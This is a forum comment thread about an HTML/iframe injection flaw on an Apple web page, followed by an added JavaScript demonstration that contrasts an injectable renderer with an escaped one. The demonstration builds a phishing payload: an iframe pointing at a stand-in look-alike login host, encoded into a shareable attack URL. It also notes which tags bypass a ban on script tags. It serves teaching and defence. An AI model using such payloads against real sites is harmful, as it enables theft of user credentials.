As I mentioned on proggit, that URL doesn't actually demonstrate cross-site scripting, but it looks like the page is vulnerable to iframe and scripting insertion too. Example:
Someone could make an iframe with what looked like the Apple login and trick people into "logging in". Then they distribute the URL via shortened URLs through Twitter and grab a bunch of Apple logins.
Free iTunes until you get caught. Chances are Apple would be able to track who downloaded what onto what Apple devices. I'm sure retribution would be swift and thorough.
In my opinion that does count as an XSS attack, though it perhaps does not use the traditional techniques. (This is for those who have said that this is actually not an XSS attack.)
It looks like the "XSS" bug is mostly client-side; I think that the GET contents are presented using JS: http://grab.by/exu (that's with the given URL).
It doesn't allow any kind of <script> tag, so yeah, it's fun and a bit insecure (may be used for phishing?? dunno), but it's not the worst at all.
I was wrong, you're right! Now that's medium-insecure. But still no need to panic at this, just XSS and client-side (everything is inserted by JS). Well, there are worse things, right? :)
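The injection the commenters are describing (a query-string value that the page's own JavaScript writes into the DOM, so that an attacker can plant an `<iframe>` mimicking a login form) is easy to model without a browser. The following is an added example, not code from any commenter or from the site under discussion; the parameter name `q`, the hostnames, and the search page are assumptions chosen for illustration. It shows the vulnerable rendering beside an escaped version and a constructed phishing payload of the kind mentioned in the thread.

```javascript
// Added example (not from the thread): a minimal model of DOM-based injection
// where a page takes a query-string parameter and renders it with innerHTML.
// Parameter name "q", hostnames and paths below are assumptions for illustration.

// Extract a query-string parameter the way location.search parsing would.
function getParam(url, name) {
  return new URL(url).searchParams.get(name) ?? "";
}

// Vulnerable: the untrusted value is spliced straight into markup, exactly what
// `el.innerHTML = "You searched for: " + value` does in the browser.
// Note: browsers do not execute <script> elements inserted via innerHTML, which
// is why a page like this can "not allow" script tags and still be injectable:
// <iframe>, <img onerror=...>, <a href="javascript:..."> and similar still work.
function renderVulnerable(url) {
  const q = getParam(url, "q");
  return `<p>You searched for: ${q}</p>`;
}

// Escape the five characters that matter in an HTML text context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: escape before concatenation (or, in the browser, assign to
// el.textContent instead of el.innerHTML so the value is never parsed as markup).
function renderHardened(url) {
  const q = getParam(url, "q");
  return `<p>You searched for: ${escapeHtml(q)}</p>`;
}

// Does the rendered output contain a live iframe element?
function containsLiveIframe(html) {
  return /<iframe\b/i.test(html);
}

// Constructed phishing payload: an iframe pointing at an attacker-controlled
// look-alike login page. login.example.test is a hypothetical attacker host.
const payload =
  '<iframe src="https://login.example.test/apple" ' +
  'style="width:100%;height:600px;border:0"></iframe>';

// The link an attacker would shorten and spread; www.example.com stands in for
// the vulnerable site (assumption, not the real target).
const attackUrl =
  "https://www.example.com/search?q=" + encodeURIComponent(payload);

console.log("vulnerable:", renderVulnerable(attackUrl));
console.log("hardened:  ", renderHardened(attackUrl));
console.log("iframe survives (vulnerable):", containsLiveIframe(renderVulnerable(attackUrl)));
console.log("iframe survives (hardened):  ", containsLiveIframe(renderHardened(attackUrl)));
```

Run it with Node: the vulnerable renderer emits the iframe intact, so a victim clicking the shortened link would see a fake login form inside the real site's page (and origin), while the escaped renderer shows the payload as harmless text. Framing-defence headers (`X-Frame-Options`, `frame-ancestors`) do not help here, since the legitimate page is the one doing the framing.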
Because it does not try to keep up with the fast-paced, complex flaws of Rich Internet Apps written by people who have no knowledge of information security and are only interested in getting attention for themselves and their shitty start-up.